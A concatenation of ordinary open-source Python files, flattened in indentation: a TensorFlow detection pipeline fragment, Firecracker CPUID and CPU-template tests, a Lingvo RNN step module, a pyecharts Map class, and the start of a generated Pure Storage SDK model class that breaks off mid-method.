if predicted_offsets is not None:
predicted_boxes = utils.rescale_with_offsets(
predicted_boxes, utils.flatten_percell_output(predicted_offsets), epsilon)
## Extract n best patches
# crop_boxes: (batch, num_crops, 4)
# crop_boxes_confidences: (batch, num_crops)
predicted_scores = tf.squeeze(predicted_scores, axis=-1)
if isinstance(num_outputs, tf.Tensor) or num_outputs > 0:
# Non-Maximum Suppression: outputs the top `num_outputs` boxes after NMS
if (isinstance(nms_threshold, tf.Tensor) or nms_threshold < 1.0) or (isinstance(num_outputs, tf.Tensor)):
batch_size = get_defaults(kwargs, ['previous_batch_size'], verbose=verbose)[0]
current_batch = tf.shape(predicted_boxes)[0]
with tf.name_scope('nms'):
nms_boxes = []
nms_boxes_confidences = []
for i in range(batch_size):
boxes, scores = tf.cond(
i < current_batch, # last batch can be smaller
true_fn=lambda: utils.nms_with_pad(predicted_boxes[i, :, :],
predicted_scores[i, :],
num_outputs,
iou_threshold=nms_threshold),
false_fn=lambda: (tf.zeros((num_outputs, 4)), tf.zeros((num_outputs,)))
)
nms_boxes.append(boxes)
nms_boxes_confidences.append(scores)
# Reshape nms boxes output
predicted_boxes = tf.stack(nms_boxes, axis=0)
predicted_boxes = tf.slice(predicted_boxes, (0, 0, 0), (current_batch, -1, -1))
predicted_boxes = tf.reshape(predicted_boxes, (-1, num_outputs, 4))
# Reshape nms scores output
predicted_scores = tf.stack(nms_boxes_confidences, axis=0)
predicted_scores = tf.slice(predicted_scores, (0, 0), (current_batch, -1))
predicted_scores = tf.reshape(predicted_scores, (-1, num_outputs))
# No NMS: Outputs `num_outputs` boxes with the best confidence scores
        # num_outputs needs to be defined for tf.nn.top_k
else:
predicted_scores, top_indices = tf.nn.top_k(predicted_scores, k=num_outputs)
batch_indices = tf.range(tf.shape(predicted_boxes)[0])
batch_indices = tf.tile(tf.expand_dims(batch_indices, axis=-1), (1, num_outputs))
gather_indices = tf.stack([batch_indices, top_indices], axis=-1)
predicted_boxes = tf.gather_nd(predicted_boxes, gather_indices)
# No filtering
return predicted_boxes, predicted_scores, kept_out_filter
def tile_and_reshape(t, num_crops):
""" Given an initial Tensor `t` of shape (batch_size, s1...sn), tile and reshape it to size
(batch_size * `num_crops`, s1..sn) to be forwarded to the next stage input.
Note that s1...sn should be a *fully defined* shape.
"""
new_shape = t.get_shape().as_list()
new_shape[0] = -1
t = tf.expand_dims(t, axis=1)
tile_pattern = [1] * len(t.get_shape())
tile_pattern[1] = num_crops
tile_pattern = tf.stack(tile_pattern, axis=0)
t = tf.tile(t, tile_pattern)
    assert None not in new_shape
t = tf.reshape(t, new_shape)
return t
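# Illustrative shape walkthrough for `tile_and_reshape` (sizes are assumptions chosen
# for this sketch):
#   t: (batch_size=2, 3)  -> expand_dims            -> (2, 1, 3)
#                         -> tile [1, num_crops=4, 1] -> (2, 4, 3)
#                         -> reshape (-1, 3)        -> (8, 3) == (batch_size * num_crops, 3)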
def get_next_stage_inputs(inputs,
crop_boxes,
batch_size=None,
image_size=256,
previous_batch_size=None,
full_image_size=1024,
image_folder=None,
image_format=None,
grid_offsets=None,
intersection_ratio_threshold=0.25,
epsilon=1e-8,
use_queue=False,
shuffle_buffer=1,
num_threads=1,
capacity=5000,
verbose=False):
"""
Create input queue for the second - and final - stage.
Args:
      inputs, a dictionary of inputs
crop_boxes, a (batch_size, num_crops, 4) tensor of crops
image_folder: Image directory, used for reloading the full resolution images if needed
batch_size: Batch size for the output of this pipeline
image_size: Size of the images patches in the new dataset
full_image_size: Size of the images to load before applying the croppings
grid_offsets: A (num_cells, num_cells) array
use_queue: Whether to use a queue or directly output the new inputs dictionary
shuffle_buffer: shuffle buffer of the output queue
num_threads: number of readers in the output queue
capacity: Output queue capacity
verbose: verbosity
"""
assert 0. <= intersection_ratio_threshold < 1.
num_crops = tf.shape(crop_boxes)[1]
new_inputs = {}
# new_im_id: (batch_size * num_crops,)
if 'im_id' in inputs:
with tf.name_scope('im_ids'):
new_inputs['im_id'] = tile_and_reshape(inputs['im_id'], num_crops)
# classes: (batch_size * num_crops, num_classes)
if 'class_labels' in inputs:
with tf.name_scope('class_labels'):
new_inputs['class_labels'] = tile_and_reshape(inputs['class_labels'], num_crops)
# new_image: (num_patches, image_size, image_size, 3)
with tf.name_scope('extract_image_patches'):
# Extract patches and resize
# crop_boxes_indices: (batch_size * num_crops,)
# crop_boxes_flat: (batch_size * num_crops, 4)
crop_boxes_indices = tf.ones(tf.shape(crop_boxes)[:2], dtype=tf.int32)
crop_boxes_indices = tf.cumsum(crop_boxes_indices, axis=0, exclusive=True)
crop_boxes_indices = tf.reshape(crop_boxes_indices, (-1,))
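        # Illustrative (assumed sizes): with batch_size=2 and num_crops=3, the exclusive
        # cumsum over a ones tensor gives [[0, 0, 0], [1, 1, 1]], so after the reshape
        # crop_boxes_indices == [0, 0, 0, 1, 1, 1] -- each flattened crop points back to
        # the image it was taken from, as tf.image.crop_and_resize expects.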
crop_boxes_flat = tf.gather(tf.reshape(crop_boxes, (-1, 4)), [1, 0, 3, 2], axis=-1)
new_inputs['image'] = tf.image.crop_and_resize(
inputs['image'], crop_boxes_flat, crop_boxes_indices,
(image_size, image_size), name='extract_groups')
# new_bounding_boxes: (num_patches, max_num_bbs, 4)
# rescale bounding boxes coordinates to the cropped image
if 'bounding_boxes' in inputs:
with tf.name_scope('shift_bbs'):
# bounding_boxes: (batch, num_crops, max_num_bbs, 4)
# crop_boxes: (batch, num_crops, 1, 4)
bounding_boxes = inputs['bounding_boxes']
max_num_bbs = bounding_boxes.get_shape()[1].value
bounding_boxes = tf.expand_dims(bounding_boxes, axis=1)
bounding_boxes = tf.tile(bounding_boxes, (1, num_crops, 1, 1))
crop_boxes = tf.expand_dims(crop_boxes, axis=2)
# Filter out cut bbs
ratios = utils.get_intersection_ratio(tf.split(bounding_boxes, 4, axis=-1), tf.split(crop_boxes, 4, axis=-1))
condition = tf.tile(ratios > intersection_ratio_threshold, (1, 1, 1, 4))
bounding_boxes *= tf.to_float(condition)
# Rescale coordinates to the cropped image
crop_mins, crop_maxs = tf.split(crop_boxes, 2, axis=-1)
bounding_boxes -= tf.tile(crop_mins, (1, 1, 1, 2))
bounding_boxes /= tf.maximum(epsilon, tf.tile(crop_maxs - crop_mins, (1, 1, 1, 2)))
bounding_boxes = tf.clip_by_value(bounding_boxes, 0., 1.)
bounding_boxes = tf.reshape(bounding_boxes, (-1, max_num_bbs, 4))
new_inputs['bounding_boxes'] = bounding_boxes
# number of valid boxes: (num_patches,)
if 'num_boxes' in inputs:
with tf.name_scope('num_boxes'):
valid_boxes = ((bounding_boxes[..., 2] > bounding_boxes[..., 0]) &
(bounding_boxes[..., 3] > bounding_boxes[..., 1]))
num_boxes = tf.to_float(valid_boxes)
new_inputs['num_boxes'] = tf.to_int32(tf.reduce_sum(num_boxes, axis=-1) )
# Compute the box presence in cell mask
# obj_i_mask_bbs: (num_patches, num_cells, num_cells, 1, num_gt)
if 'obj_i_mask_bbs' in inputs:
with tf.name_scope('grid_offsets'):
if grid_offsets is not None:
num_cells = grid_offsets.shape[:2]
grid_offsets_mins = grid_offsets / num_cells
grid_offsets_maxs = (grid_offsets + 1.) / num_cells
bounding_boxes = tf.reshape(bounding_boxes, (-1, 1, 1, max_num_bbs, 4))
mins, maxs = tf.split(bounding_boxes, 2, axis=-1)
inters = tf.maximum(0., tf.minimum(maxs, grid_offsets_maxs) - tf.maximum(mins, grid_offsets_mins))
inters = tf.reduce_prod(inters, axis=-1)
obj_i_mask = tf.expand_dims(tf.to_float(inters > 0.) , axis=-2)
new_inputs['obj_i_mask_bbs'] = obj_i_mask
# During training: enqueue the inputs
if use_queue:
assert batch_size is not None
filter_valid = tf.logical_and(crop_boxes[..., 2] > crop_boxes[..., 0], crop_boxes[..., 3] > crop_boxes[..., 1] )
filter_valid = tf.reshape(filter_valid, (-1,))
# TODO maybe_batch is deprecated
out_ = tf.train.maybe_batch(
new_inputs, filter_valid, batch_size, num_threads=num_threads, enqueue_many=True, capacity=capacity)
# During inference: process crops deterministically
else:
out_ = new_inputs
if verbose == 1:
print('\n'.join(" \033[32m%s\033[0m: shape=%s, dtype=%s" % (key, value.get_shape().as_list(), value.dtype)
for key, value in out_.items() if key != 'batch_size'))
elif verbose > 1:
print('\n'.join(" *%s*: shape=%s, dtype=%s" % (key, value.get_shape().as_list(), value.dtype)
for key, value in out_.items() if key != 'batch_size'))
return out_ |
the-stack_106_23832 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""Tests for the CPU topology emulation feature."""
import platform
import re
import pytest
import framework.utils_cpuid as utils
import host_tools.network as net_tools
PLATFORM = platform.machine()
def _check_cpuid_x86(test_microvm, expected_cpu_count, expected_htt):
expected_cpu_features = {
"cpu count": '{} ({})'.format(hex(expected_cpu_count),
expected_cpu_count),
"CLFLUSH line size": "0x8 (8)",
"hypervisor guest status": "true",
"hyper-threading / multi-core supported": expected_htt
}
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
expected_cpu_features)
def _check_cpu_features_arm(test_microvm):
expected_cpu_features = {
"Flags": "fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp "
"asimdhp cpuid asimdrdm lrcpc dcpop asimddp ssbs",
}
utils.check_guest_cpuid_output(test_microvm, "lscpu", None, ':',
expected_cpu_features)
@pytest.mark.skipif(
PLATFORM != "x86_64",
reason="CPUID is only supported on x86_64."
)
@pytest.mark.parametrize(
"num_vcpus",
[1, 2, 16],
)
@pytest.mark.parametrize(
"htt",
[True, False],
)
def test_cpuid(test_microvm_with_ssh, network_config, num_vcpus, htt):
"""
Check the CPUID for a microvm with the specified config.
@type: functional
"""
vm = test_microvm_with_ssh
vm.spawn()
vm.basic_config(vcpu_count=num_vcpus, ht_enabled=htt)
_tap, _, _ = vm.ssh_network_config(network_config, '1')
vm.start()
_check_cpuid_x86(vm, num_vcpus, "true" if num_vcpus > 1 else "false")
@pytest.mark.skipif(
PLATFORM != "aarch64",
reason="The CPU features on x86 are tested as part of the CPU templates."
)
def test_cpu_features(test_microvm_with_ssh, network_config):
"""
Check the CPU features for a microvm with the specified config.
@type: functional
"""
vm = test_microvm_with_ssh
vm.spawn()
vm.basic_config()
_tap, _, _ = vm.ssh_network_config(network_config, '1')
vm.start()
_check_cpu_features_arm(vm)
@pytest.mark.skipif(
PLATFORM != "x86_64",
reason="The CPU brand string is masked only on x86_64."
)
def test_brand_string(test_microvm_with_ssh, network_config):
"""
Ensure good formatting for the guest brand string.
* For Intel CPUs, the guest brand string should be:
Intel(R) Xeon(R) Processor @ {host frequency}
where {host frequency} is the frequency reported by the host CPUID
(e.g. 4.01GHz)
* For AMD CPUs, the guest brand string should be:
AMD EPYC
* For other CPUs, the guest brand string should be:
""
@type: functional
"""
cif = open('/proc/cpuinfo', 'r')
host_brand_string = None
while True:
line = cif.readline()
if line == '':
break
mo = re.search("^model name\\s+:\\s+(.+)$", line)
if mo:
host_brand_string = mo.group(1)
cif.close()
assert host_brand_string is not None
test_microvm = test_microvm_with_ssh
test_microvm.spawn()
test_microvm.basic_config(vcpu_count=1)
_tap, _, _ = test_microvm.ssh_network_config(network_config, '1')
test_microvm.start()
ssh_connection = net_tools.SSHConnection(test_microvm.ssh_config)
guest_cmd = "cat /proc/cpuinfo | grep 'model name' | head -1"
_, stdout, stderr = ssh_connection.execute_command(guest_cmd)
assert stderr.read() == ''
line = stdout.readline().rstrip()
mo = re.search("^model name\\s+:\\s+(.+)$", line)
assert mo
guest_brand_string = mo.group(1)
assert guest_brand_string
cpu_vendor = utils.get_cpu_vendor()
expected_guest_brand_string = ""
if cpu_vendor == utils.CpuVendor.AMD:
expected_guest_brand_string += "AMD EPYC"
elif cpu_vendor == utils.CpuVendor.INTEL:
expected_guest_brand_string = "Intel(R) Xeon(R) Processor"
mo = re.search("[.0-9]+[MG]Hz", host_brand_string)
if mo:
expected_guest_brand_string += " @ " + mo.group(0)
assert guest_brand_string == expected_guest_brand_string
@pytest.mark.skipif(
PLATFORM != "x86_64",
reason="CPU features are masked only on x86_64."
)
@pytest.mark.parametrize("cpu_template", ["T2", "C3"])
def test_cpu_template(test_microvm_with_ssh, network_config, cpu_template):
"""
Test masked and enabled cpu features against the expected template.
This test checks that all expected masked features are not present in the
guest and that expected enabled features are present for each of the
supported CPU templates.
@type: functional
"""
test_microvm = test_microvm_with_ssh
test_microvm.spawn()
test_microvm.basic_config(vcpu_count=1)
# Set template as specified in the `cpu_template` parameter.
response = test_microvm.machine_cfg.put(
vcpu_count=1,
mem_size_mib=256,
ht_enabled=False,
cpu_template=cpu_template,
)
assert test_microvm.api_session.is_status_no_content(response.status_code)
_tap, _, _ = test_microvm.ssh_network_config(network_config, '1')
response = test_microvm.actions.put(action_type='InstanceStart')
if utils.get_cpu_vendor() != utils.CpuVendor.INTEL:
# We shouldn't be able to apply Intel templates on AMD hosts
assert test_microvm.api_session.is_status_bad_request(
response.status_code)
return
assert test_microvm.api_session.is_status_no_content(
response.status_code)
check_masked_features(test_microvm, cpu_template)
check_enabled_features(test_microvm, cpu_template)
def check_masked_features(test_microvm, cpu_template):
"""Verify the masked features of the given template."""
common_masked_features_lscpu = ["dtes64", "monitor", "ds_cpl", "tm2",
"cnxt-id", "sdbg", "xtpr", "pdcm",
"osxsave",
"psn", "ds", "acpi", "tm", "ss", "pbe",
"fpdp", "rdt_m", "rdt_a", "mpx", "avx512f",
"intel_pt",
"avx512_vpopcntdq",
"3dnowprefetch", "pdpe1gb"]
common_masked_features_cpuid = {"SGX": "false", "HLE": "false",
"RTM": "false", "RDSEED": "false",
"ADX": "false", "AVX512IFMA": "false",
"CLFLUSHOPT": "false", "CLWB": "false",
"AVX512PF": "false", "AVX512ER": "false",
"AVX512CD": "false", "SHA": "false",
"AVX512BW": "false", "AVX512VL": "false",
"AVX512VBMI": "false", "PKU": "false",
"OSPKE": "false", "RDPID": "false",
"SGX_LC": "false",
"AVX512_4VNNIW": "false",
"AVX512_4FMAPS": "false",
"XSAVEC": "false", "XGETBV": "false",
"XSAVES": "false"}
# These are all discoverable by cpuid -1.
c3_masked_features = {"FMA": "false", "MOVBE": "false", "BMI": "false",
"AVX2": "false", "BMI2": "false", "INVPCID": "false"}
# Check that all common features discoverable with lscpu
# are properly masked.
ssh_connection = net_tools.SSHConnection(test_microvm.ssh_config)
guest_cmd = "cat /proc/cpuinfo | grep 'flags' | head -1"
_, stdout, stderr = ssh_connection.execute_command(guest_cmd)
assert stderr.read() == ''
cpu_flags_output = stdout.readline().rstrip().split(' ')
for feature in common_masked_features_lscpu:
assert feature not in cpu_flags_output, feature
# Check that all common features discoverable with cpuid
# are properly masked.
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
common_masked_features_cpuid)
if cpu_template == "C3":
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
c3_masked_features)
    # Check if XSAVE PKRU is masked for T2/C3.
expected_cpu_features = {
"XCR0 supported: PKRU state": "false"
}
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
expected_cpu_features)
def check_enabled_features(test_microvm, cpu_template):
"""Test for checking that all expected features are enabled in guest."""
enabled_list = { # feature_info_1_edx
"x87 FPU on chip": "true", "CMPXCHG8B inst": "true",
"virtual-8086 mode enhancement": "true",
"SSE extensions": "true", "SSE2 extensions": "true",
"debugging extensions": "true",
"page size extensions": "true",
"time stamp counter": "true",
"RDMSR and WRMSR support": "true",
"physical address extensions": "true",
"machine check exception": "true",
"APIC on chip": "true", "MMX Technology": "true",
"SYSENTER and SYSEXIT": "true",
"memory type range registers": "true",
"PTE global bit": "true", "FXSAVE/FXRSTOR": "true",
"machine check architecture": "true",
"conditional move/compare instruction": "true",
"page attribute table": "true",
"page size extension": "true",
"CLFLUSH instruction": "true",
# feature_info_1_ecx
"PNI/SSE3: Prescott New Instructions": "true",
"PCLMULDQ instruction": "true",
"SSSE3 extensions": "true",
"AES instruction": "true",
"CMPXCHG16B instruction": "true",
"process context identifiers": "true",
"SSE4.1 extensions": "true",
"SSE4.2 extensions": "true",
"extended xAPIC support": "true",
"POPCNT instruction": "true",
"time stamp counter deadline": "true",
"XSAVE/XSTOR states": "true",
"OS-enabled XSAVE/XSTOR": "true",
"AVX: advanced vector extensions": "true",
"F16C half-precision convert instruction": "true",
"RDRAND instruction": "true",
"hypervisor guest status": "true",
# thermal_and_power_mgmt
"ARAT always running APIC timer": "true",
# extended_features
"FSGSBASE instructions": "true",
"IA32_TSC_ADJUST MSR supported": "true",
"SMEP supervisor mode exec protection": "true",
"enhanced REP MOVSB/STOSB": "true",
"SMAP: supervisor mode access prevention": "true",
# xsave_0xd_0
"XCR0 supported: x87 state": "true",
"XCR0 supported: SSE state": "true",
"XCR0 supported: AVX state": "true",
# xsave_0xd_1
"XSAVEOPT instruction": "true",
# extended_080000001_edx
"SYSCALL and SYSRET instructions": "true",
"64-bit extensions technology available": "true",
"execution disable": "true", "RDTSCP": "true",
# intel_080000001_ecx
"LAHF/SAHF supported in 64-bit mode": "true",
# adv_pwr_mgmt
"TscInvariant": "true"}
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
enabled_list)
if cpu_template == "T2":
t2_enabled_features = {"FMA": "true", "BMI": "true", "BMI2": "true",
"AVX2": "true", "MOVBE": "true",
"INVPCID": "true"}
utils.check_guest_cpuid_output(test_microvm, "cpuid -1", None, '=',
t2_enabled_features)
|
the-stack_106_23833 | # Lint as: python2, python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Step APIs for RNN layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from lingvo import compat as tf
from lingvo.core import base_layer
from lingvo.core import py_utils
from lingvo.core import rnn_cell
from lingvo.core import step
from six.moves import range
class RnnStep(step.Step):
"""A step containing an RNNCell."""
@classmethod
def Params(cls):
p = super(RnnStep, cls).Params()
p.Define('cell', rnn_cell.LSTMCellSimple.Params(),
'Params for the RNN cell.')
return p
@base_layer.initializer
def __init__(self, params):
super(RnnStep, self).__init__(params)
p = params
with tf.variable_scope(p.name):
self.CreateChild('cell', p.cell)
def PrepareExternalInputs(self, theta, external_inputs):
"""Does not modify the external_inputs parameter.
This parameter, if provided, is assumed to be a vector that should be
concatenated with the other vectors in step_inputs.inputs.
Args:
theta: unused.
external_inputs: Either a tensor or None.
Returns:
external_inputs, unmodified.
"""
return external_inputs
def ZeroState(self, theta, prepared_inputs, batch_size):
"""Returns the zero_state for the RNN cell.
Args:
theta: Variables used by the RNNCell.
prepared_inputs: unused.
batch_size: An int scalar representing the batch size of per-step inputs.
Returns:
The zero state of the RNNCell.
"""
return self.cell.zero_state(theta.cell, batch_size)
def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):
"""Performs one inference step on the RNN cell.
If external_inputs is not None, it is added as another act input
to the RNNCell.
Args:
theta: Variables used by the RNNCell.
      prepared_inputs: If not None, concatenated with step_inputs.inputs. A
        tensor of shape [batch_size, external_input_dim].
step_inputs: A NestedMap containing an 'input' list of [batch_size, dim]
where the sum of dim (including external_inputs) is
p.cell.num_input_nodes.
padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this
batch element is empty in this step.
state0: A NestedMap of state, either produced by ZeroState or a previous
invocation of FProp.
Returns:
(output, state1), where output is the cell output (GetOutput(state1))
of shape [batch_size, p.cell.num_output_nodes], and state1 is the cell's
recurrent state.
"""
cell_inputs = py_utils.NestedMap(act=step_inputs.inputs)
# An empty NestedMap can act as a None value here.
if prepared_inputs is not None and not isinstance(prepared_inputs,
py_utils.NestedMap):
cell_inputs.act.append(prepared_inputs)
cell_inputs.padding = padding
state1, extra = self.cell.FProp(theta.cell, state0, cell_inputs)
return py_utils.NestedMap(
output=self.cell.GetOutput(state1), extra=extra,
padding=padding), state1
class RnnStackStep(step.Step):
"""A stack of RnnSteps.
Three types of inputs are supported:
step_inputs.input: This is the standard input. It is expected to change
on every step of the sequence, and it is fed only to the first layer.
step_inputs.context: This input changes for each step of the sequence, but
is fed to every layer.
external_inputs: This input is fixed at the beginning of the sequence.
It is fed to every layer.
Residual connections are also supported. When residual_start >= 0, the output
of layer i (i >= residual_start) is added to the output of layer
i - residual_stride.
"""
@classmethod
def Params(cls):
"""Constructs Params for an RnnStackStep."""
p = super(RnnStackStep, cls).Params()
p.Define(
'rnn_cell_tpl', rnn_cell.LSTMCellSimple.Params(),
'RNNCell params template. '
'Can be a single param or '
'a list of rnn_layers params, one for each layer.')
p.Define(
'external_input_dim', 0, 'Size of the external input. '
'The external input is given at the start of the sequence '
'and is given to every layer at every step.')
p.Define(
'step_input_dim', 0, 'Size of the step input. '
'This input is only given to the first layer and is expected to '
'be different for each step.')
p.Define(
'context_input_dim', 0, 'Size of the context input. '
'This input is given to every layer and is expected to be '
'different for each step.')
p.Define(
'rnn_cell_dim', 0, 'Size of the rnn cells. '
'This may be overridden by parameters set in rnn_cell_tpl.')
p.Define(
'rnn_cell_hidden_dim', 0, 'internal size of the rnn cells. When '
'set to > 0 it enables a projection layer at the output of the '
'rnn cell. This may be overridden by parameters set in rnn_cell_tpl.')
p.Define('rnn_layers', 1, 'Number of rnn layers.')
p.Define(
'residual_start', -1,
'Start residual connections from this layer. For this and higher '
'layers, the layer output is the sum of the RNN cell output and '
'input; if the layer also normalizes its output, then the '
'normalization is done over this sum. Set to -1 to disable '
'residual connections.')
p.Define('residual_stride', 1,
'Number of lstm layers to skip per residual connection.')
return p
@base_layer.initializer
def __init__(self, params):
super(RnnStackStep, self).__init__(params)
p = params
sub = []
# Users can either provide a single rnn_cell_tpl or one per layer.
# If only one is provided, we replicate it for each layer.
rnn_cell_tpls = p.rnn_cell_tpl
if not isinstance(rnn_cell_tpls, list):
rnn_cell_tpls = [p.rnn_cell_tpl] * p.rnn_layers
# We may provide up to three tensors as input to the RnnStep:
# the normal input, the context input (from step_inputs.context),
# and the external input (from external_inputs).
arity = 1
if p.context_input_dim:
arity += 1
if p.external_input_dim:
arity += 1
extra_dim = p.context_input_dim + p.external_input_dim
# The first layer's input comes from step_inputs.input. Later layers
# will get their inputs from the previous layer's output.
input_nodes = p.step_input_dim
for i in range(p.rnn_layers):
step_i = RnnStep.Params()
step_i.name = 'rnn_%d' % (i)
step_i.cell = rnn_cell_tpls[i].Copy()
step_i.cell.num_input_nodes = input_nodes + extra_dim
step_i.cell.inputs_arity = arity
# The dimensions of each cell may be specified in the cell template
# but most users will specify them in the stack params.
if step_i.cell.num_output_nodes == 0:
step_i.cell.num_output_nodes = p.rnn_cell_dim
if step_i.cell.num_hidden_nodes == 0:
step_i.cell.num_hidden_nodes = p.rnn_cell_hidden_dim
input_nodes = step_i.cell.num_output_nodes
sub.append(step_i)
stack_params = step.StackStep.Params()
stack_params.name = p.name
stack_params.sub = sub
stack_params.residual_start = p.residual_start
stack_params.residual_stride = p.residual_stride
self.CreateChild('stack', stack_params)
def PrepareExternalInputs(self, theta, external_inputs):
"""Delegates external inputs preparation to sub-layers.
Args:
theta: A `.NestedMap` object containing weight values of this layer and
its children layers.
external_inputs: A `.NestedMap` object. The structure of the internal
fields is defined by the sub-steps.
Returns:
A `.NestedMap` containing a pre-processed version of the external_inputs,
one per sub-step.
"""
return self.stack.PrepareExternalInputs(theta.stack, external_inputs)
def ZeroState(self, theta, prepared_inputs, batch_size):
"""Computes a zero state for each sub-step.
Args:
theta: A `.NestedMap` object containing weight values of this layer and
its children layers.
prepared_inputs: An output from PrepareExternalInputs.
batch_size: The number of items in the batch that FProp will process.
Returns:
A `.NestedMap` containing a state0 object for each sub-step.
"""
return self.stack.ZeroState(theta.stack, prepared_inputs, batch_size)
def FProp(self, theta, prepared_inputs, step_inputs, padding, state0):
"""Performs inference on the stack of sub-steps.
See the documentation for StackStep for the particulars of passing context
information to layers.
Args:
theta: A `.NestedMap` object containing weight values of this layer and
its children layers.
prepared_inputs: An output from PrepareExternalInputs.
      step_inputs: A `.NestedMap` containing a list called 'inputs', and
        optionally a tensor called 'context'.
padding: A 0/1 float tensor of shape [batch_size]; 1.0 means that this
batch element is empty in this step.
state0: The previous recurrent state.
Returns:
(output, state1):
- output: A `.NestedMap` containing the output of the top-most step.
- state1: The recurrent state to feed to next invocation of this graph.
"""
return self.stack.FProp(theta.stack, prepared_inputs, step_inputs, padding,
state0)
|
the-stack_106_23834 | # coding=utf-8
from pyecharts.chart import Chart
class Map(Chart):
"""
    <<< Map >>>
    The map chart is mainly used to visualize data over geographical regions.
"""
def __init__(self, title="", subtitle="", **kwargs):
super(Map, self).__init__(title, subtitle, **kwargs)
def add(self, *args, **kwargs):
self.__add(*args, **kwargs)
def __add(
self,
name,
attr,
value,
maptype="china",
is_roam=True,
is_map_symbol_show=True,
name_map=None,
**kwargs
):
"""
        :param name:
            Series name, used for tooltip display and legend filtering.
        :param attr:
            Attribute (region) names.
        :param value:
            Values corresponding to each attribute.
        :param maptype:
            Map type. Since v0.3.2+, maps are shipped as extension packages
            covering Chinese provinces, cities, counties/districts, world
            countries, etc. See [map customization](zh-cn/customize_map)
            for details.
        :param is_roam:
            Whether to enable mouse zoom and pan roaming. Defaults to True.
            Set to 'scale' or 'move' to enable only zooming or only panning;
            True enables both.
        :param is_map_symbol_show:
            Whether to show the red marker dots on the map. Defaults to True.
        :param name_map:
            Custom name mapping for map regions. Defaults to None, i.e. the
            map's built-in place names are used.
:param kwargs:
"""
assert len(attr) == len(value)
chart = self._get_all_options(**kwargs)
_data = []
for data in zip(attr, value):
_name, _value = data
_data.append({"name": _name, "value": _value})
self._option.get("legend")[0].get("data").append(name)
__option__ = {
"type": "map",
"name": name,
"symbol": chart["symbol"],
"label": chart["label"],
"mapType": maptype,
"data": _data,
"roam": is_roam,
"showLegendSymbol": is_map_symbol_show,
}
if name_map:
__option__["nameMap"] = name_map
self._option.get("series").append(__option__)
self._add_chinese_map(maptype)
self._config_components(**kwargs)
|
the-stack_106_23835 | # coding: utf-8
"""
Pure Storage FlashBlade REST 1.9 Python SDK
Pure Storage FlashBlade REST 1.9 Python SDK, developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.9
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class PureArray(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
#BEGIN_CUSTOM
# IR-51527: Prevent Pytest from attempting to collect this class based on name.
__test__ = False
#END_CUSTOM
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'id': 'str',
'ntp_servers': 'list[str]',
'os': 'str',
'revision': 'str',
'time_zone': 'str',
'version': 'str'
}
attribute_map = {
'name': 'name',
'id': 'id',
'ntp_servers': 'ntp_servers',
'os': 'os',
'revision': 'revision',
'time_zone': 'time_zone',
'version': 'version'
}
def __init__(self, name=None, id=None, ntp_servers=None, os=None, revision=None, time_zone=None, version=None): # noqa: E501
"""PureArray - a model defined in Swagger""" # noqa: E501
self._name = None
self._id = None
self._ntp_servers = None
self._os = None
self._revision = None
self._time_zone = None
self._version = None
self.discriminator = None
if name is not None:
self.name = name
if id is not None:
self.id = id
if ntp_servers is not None:
self.ntp_servers = ntp_servers
if os is not None:
self.os = os
if revision is not None:
self.revision = revision
if time_zone is not None:
self.time_zone = time_zone
if version is not None:
self.version = version
@property
def name(self):
"""Gets the name of this PureArray. # noqa: E501
The name of the object # noqa: E501
:return: The name of this PureArray. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this PureArray.
The name of the object # noqa: E501
:param name: The name of this PureArray. # noqa: E501
:type: str
"""
self._name = name
@property
def id(self):
"""Gets the id of this PureArray. # noqa: E501
A globally unique ID chosen by the system. Cannot change. Cannot ever refer to another resource. # noqa: E501
:return: The id of this PureArray. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this PureArray.
A globally unique ID chosen by the system. Cannot change. Cannot ever refer to another resource. # noqa: E501
:param id: The id of this PureArray. # noqa: E501
:type: str
"""
self._id = id
@property
def ntp_servers(self):
"""Gets the ntp_servers of this PureArray. # noqa: E501
:return: The ntp_servers of this PureArray. # noqa: E501
:rtype: list[str]
"""
return self._ntp_servers
@ntp_servers.setter
def ntp_servers(self, ntp_servers):
"""Sets the ntp_servers of this PureArray.
:param ntp_servers: The ntp_servers of this PureArray. # noqa: E501
:type: list[str]
"""
self._ntp_servers = ntp_servers
@property
def os(self):
"""Gets the os of this PureArray. # noqa: E501
Possible values are Purity//FA and Purity//FB. # noqa: E501
:return: The os of this PureArray. # noqa: E501
:rtype: str
"""
return self._os
@os.setter
def os(self, os):
"""Sets the os of this PureArray.
Possible values are Purity//FA and Purity//FB. # noqa: E501
:param os: The os of this PureArray. # noqa: E501
:type: str
"""
self._os = os
@property
def revision(self):
"""Gets the revision of this PureArray. # noqa: E501
:return: The revision of this PureArray. # noqa: E501
:rtype: str
"""
return self._revision
@revision.setter
def revision(self, revision):
"""Sets the revision of this PureArray.
:param revision: The revision of this PureArray. # noqa: E501
:type: str
"""
self._revision = revision
@property
def time_zone(self):
"""Gets the time_zone of this PureArray. # noqa: E501
